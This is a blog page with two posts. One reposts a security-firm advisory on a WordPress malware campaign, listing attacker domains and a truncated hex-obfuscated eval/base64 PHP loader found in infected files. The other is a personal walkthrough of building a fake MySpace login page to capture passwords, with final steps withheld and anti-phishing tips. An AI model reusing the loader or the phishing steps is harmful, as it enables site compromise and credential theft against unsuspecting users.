Oct 312010

One of my blogs was hit today (Happy Halloween) by this new strain of WordPress Blog attacks.  The Sucuri Team was able to tackle the infection without issue and has posted some good information on the latest version attacking (at this point) Godaddy servers.  Read more below:

“Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites usinginsomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll. php?k=1

www3.hope-soft57. net
www3.new-protectionsoft23. in
www4.free-pc-protection9. in

http://insomniaboldinfocom.com/mm. php

http://insomniaboldinfonet.com/mm. php

www3.large-defense1. in

All the sites we’ve seen so far have the following code added to all PHP files:

$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY..

Which is basically just the eval(base64_decode encoded. What is interesting is that this site is hosted at 77.78.239.53, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related:

myblindstudioinfoonline. com
meqashoppercom. com
insomniaboldinfocom. com

The following script should clean up any infected site: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Click this link for more info on Sucuri’s Security Services!

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: +1 (from 1 vote)
Posted by admin Tagged with: , , , , , , , , , , , , , ,
Apr 092008

04.09.08 by justy

When you see the word “phishing”, many of you think, what the heck is phishing? Well, it obviously comes from the word “fishing”. It’s simply using a lure to reel victims into giving you their login & password info. It could be for your bank info, myspace or any email service that you use. A couple years ago, i figured out how to phish myspace passwords. I only tested myself to see if i could actually do it & if it would work. Sure enough, it did. Its simple really. After about 6 hours of poking around, googling & figuring out how to read the source code….voila. However, since myspace started with the captcha feature, its more difficult. But, i have found if you send the fake login link through an email to the victim & they click on it, myspace doesnt warn them, because its not coming from their site. I’ll tell you a “few” ways about how i did it. I set up an account with a website that has an HTML editor, so i chose freewebs.com. They make you wait 7days to validate your account, but its worth it. I tried geocities, but they werent as good. I went to the myspace home login page, & made sure it said “you must be logged in to do that”…it looks more believable, well, thats what i think :) Then right click & hit view page source.

view source

Select all & hit copy. I logged into my freewebs account then-> go to build & edit, which is the site manager. Click on add a page -> then label the page name (i used loginmyspace, so that when people happen to look at the URL, it has some term related to myspace), then i made sure that on the right dropbox, it was marked html, not htm. At the bottom, it shows that the file was created.

filemanager

Hit edit & a blank screen will come up. This is the HTML editor. Paste the copied source code from the myspace login page into the editor & hit save. There’s a whole bunch of coding, but the important part is to find the “form action post” where the login info is! Below is a sceenshot where i highlighted that info. This is the only part of the code that needs to be changed:

form action post highlighted

Then go to site add-ons & click webforms. THis is the info you put into the form action post in the HTML editor. The blurred info below will not be blurry, once you open it with your account info.

webforms info

The rest of the info, i cant give. But if you poke around the site, you’ll figure it out. Please keep in mind, this is for educational purposes, its not meant to do or cause malicious deeds :) ~ & please do not email me for the rest of the instructions, bc i will not give them out. If you want to avoid phishers, make sure your URL (web address) says: http://www.myspace.com & make sure nothing is before or after it in the address bar. There is an addon that you can get that will alert you if your page is being phished. It also gives information on each site you visit, meaning if its malicious or not, they alert you. This is great if you log into your bank account daily. I use it!

Here’s link to add it: netcraft anti-phishing bar

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: ,
Rss Feed Tweeter button Facebook button Technorati button Myspace button Digg button Stumbleupon button Newsvine button Youtube button

© 2010-2017 She-Geeks.com All Rights Reserved